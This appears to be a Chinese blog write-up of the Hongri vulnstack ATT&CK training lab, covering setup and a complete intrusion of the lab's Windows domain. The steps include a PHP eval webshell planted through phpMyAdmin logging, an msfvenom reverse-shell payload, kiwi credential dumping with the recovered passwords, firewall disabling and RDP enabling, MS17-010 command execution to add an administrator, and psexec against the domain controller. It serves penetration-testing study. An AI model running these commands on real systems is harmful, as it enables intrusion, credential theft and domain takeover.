红日ATT&CK实战系列靶机
Posted Jach1n
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了红日ATT&CK实战系列靶机相关的知识,希望对你有一定的参考价值。
红日ATT&CK实战系列靶机(一)
靶机信息
- 基本描述:红队实战系列,主要以真实企业环境为实例搭建一系列靶场,完全模拟ATT&CK测试链路进行搭建
- 下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
- 虚拟机初始密码:hongrisec@2019(开机后会提示更新密码)
环境搭建
靶机文件
下载好靶机环境后,解压完有三个文件夹
分别打开三个文件夹中的.vmx文件,使用vmware运行后会自动添加三个虚拟机
网络配置
根据官网给出的网络配置图片来看
kali和win7同属于VM1网段(win7需要在虚拟机配置里新加一块网卡设置为VM1)
win7又与2008和2003属VM2网段
测试路径
官网提供的测试路径如下:
测试主机:kali
web服务器:Win7
域成员:Win2003
域控:Server 2008
常见问题
1. 扫描不到win7主机的开放端口
使用nmap扫描时,扫描不到该win7主机的开放端口
因为win7新加VM1网卡,网卡的基本信息没有配置
配置一下网关这些信息,一般网关地址为.1或.2
可以用物理机ping测试下到哪个地址能通,来确定网关
配置如下,配置正确后网卡状态不再显示为未识别的网络,nmap可以正常扫描到端口
2. 扫描不到win7主机80端口
解决第1个问题后,发现只能扫到5357端口
没有开启web服务,需要在c盘下找到phpstudy,手动开启并运行
和kali同网段的VM1网络的防火墙关闭,域网络的防火墙保持开放状态,按理说vm1的防火墙不应该关的,但是开着防火墙实在没法做,官网给的信息也没说VM1防火墙配置,就暂且这样吧
3.msf中文乱码
msf的shell界面输入命令后,中文的部分会乱码,输入下列命令可以缓解一部分
chcp 65001
信息搜集
kali与win7同属VM1网络
使用nmap扫描VM1网段存活主机
nmap -sn 192.168.41.0/24
发现.128主机,猜测为win7主机,对该主机进行扫描,发现扫描不到开放端口
- 参考常见问题目录下的问题1
nmap -A 192.168.41.128
解决上述问题后,再次扫描发现只有5357端口开放 - 参考常见问题目录下的问题2
解决以上两个问题后,再次扫描,扫描结果就比较正常了
通过kali访问win7站点,发现为phpstudy探针
通过网页下方的mysql连接测试,发现使用默认密码(root/root)可以登录数据库
漏洞利用
访问http://192.168.41.128/phpmyadmin登录数据库,通过开启日志记录写入shell
在变量处,搜索general的值,修改为ON开启日志记录
开启日志记录,设置日志的存储路径,放在www目录下
然后在SQL处执行sql语句,执行语句会被记录到日志文件中
SELECT "<?php @eval($_POST[666]);?>";
使用蚁剑连接1.php文件,成功连接到蚁剑
在www目录下发现一个yxcms的目录,也是一个站点
已经通过phpmyadmin拿到权限了就不搞这个yxcms了
弹个shell到msf上,方便后面操作
用msf生成一个exe程序,回连地址为kali
msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.41.129 LPORT=666 -f exe -o shell.exe
在kali上打开msf配置监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.41.129
set LPORT 666
run
通过蚁剑上传exe文件,在虚拟终端里运行,msf上线
权限提升
msf提权到system权限
然后迁移进程,找到一个64位且权限为SYSTEM的进程进行迁移
我这里是用的services.exe,pid为488
migrate 488
加载mimikatz模块来抓取密码的话,可能抓不到密码,msf上也提示已经被kiwi取代
加载kiwi模块,抓取用户密码
获取到账户的明文密码,administrator/hongrisec@2019!
load kiwi
creds_all
清除事件日志
关闭主机的防火墙并打开3389端口,可以远程桌面连接
netsh advfirewall set allprofiles state off //关闭防火墙
netsh advfirewall show allprofiles state //查看当前防火墙状态
REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f //开放3389端口
kali上可以通过rdesktop连接远程桌面
内网搜集
查看网络配置信息
发现有两个不同网段的网卡信息,和DNS域名信息,可以判断存在域
ipconfig /all
查看当前登录域和用户
net config workstation
判断主域
net time /domain
查看域内主机,发现域内有3台主机
net view
查看当前域所有用户
net user /domain
查看域控,为owa$
net group "domain controllers" /domain
通过ping来判断其他域内其他2台主机的ip地址
发现两台主机的ip地址52.138和52.141
ping ROOT-TVI862UBEH.god.org
ping OWA.god.org
横向移动
现在需要扫描另一个网段的主机,在msf中需要添加通往.52网段的路由
先退出msf的shell界面
run autoroute -s 192.168.52.0/24
kali上设置proxychains代理设置代理
首先在msf中调用socks4a模块,但是找了许久发现没有这个模块了
最后发现可能是因为新版本kali应该是对socks4a和socks5模块进行了整合,socks_proxy模块信息如下,现在应该是变成了socks_proxy模块
查看需要配置的参数,设置上本地的ip地址
set SRVHOST 127.0.0.1
配置完成后,run运行,然后修改下代理的配置文件
vim /etc/proxychains4.conf
挂上代理使用nmap扫描对.52网段的目标主机进行扫描
由于socks代理是tcp连接,这里nmap命令只能用tcp相关的,扫描速度较慢
nmap -Pn -sT 192.168.52.138 // -Pn非ping扫描,-sT tcp连接扫描
发现扫描失败,应该是代理配置有问题
排查许久后发现将proxychains配置文件里的dynamic_chain注释掉即可,别的不用注释
挂上代理使用nmap扫描,之前的问题解决了,但是扫描的速度很慢
建议使用msf的扫描模块进行扫描,nmap太慢了
调用tcp端口扫描模块,设置目标地址,run
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.52.138
分别对之前的两台主机进行端口扫描,都开放了445端口
先对.141主机进行ms17-010漏洞扫描
msf先搜索下ms17-010的模块,选用smb_ms17_010
发现存在漏洞
background
search ms17-010
use 3
set RHOSTS 192.168.52.141
试了几个漏洞模块都利用失败,需要通过ms17_010_command命令执行来利用
使用命令执行添加一个新用户
set COMMAND net user test hongrisec@2022 /add
set RHOSTS 192.168.52.141
再将test用户添加到管理组
set COMMAND net localgroup administrators test /add
查看下是否添加成功
set COMMAND net localgroup administrators
通过之前的端口信息发现主机未开放3389端口,再把3389端口打开
注册表这里不加引号的话可能会执行失败
set COMMAND REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
使用代理连接远程桌面到.141主机
proxychains rdesktop 192.168.52.141:3389
win2003主机拿下后,接下来是域控主机.138,同样是开放445端口
看网上的文章说域控这台主机也是通过ms17-010进行利用,但我这里试了下发现是不行
需要通过smb/psexec模块来利用
use exploit/windows/smb/psexec
然后配置下信息
smb账号密码域信息是win7主机的,与之前抓到的用户名密码是一样的
LPORT端口需要为开放状态,可以通过之前的端口扫描结果来配置
set RHOSTS 192.168.52.138 //域控主机ip
set SMBDomain god //域
set SMBPass hongrisec@2019! //win7主机密码
set SMBUser Administrator //win7主机用户名
set LHOST 192.168.52.143 //win7主机52段ip,做为跳板机
set LPORT 464 //监听端口
运行后利用成功,getsystem提权
迁移进程到svchost.exe
migrate 208
加载kiwi模块抓取密码
load kiwi
creds_all
到这里所有主机都拿下了,初次学习,未做更深的测试
以上是关于红日ATT&CK实战系列靶机的主要内容,如果未能解决你的问题,请参考以下文章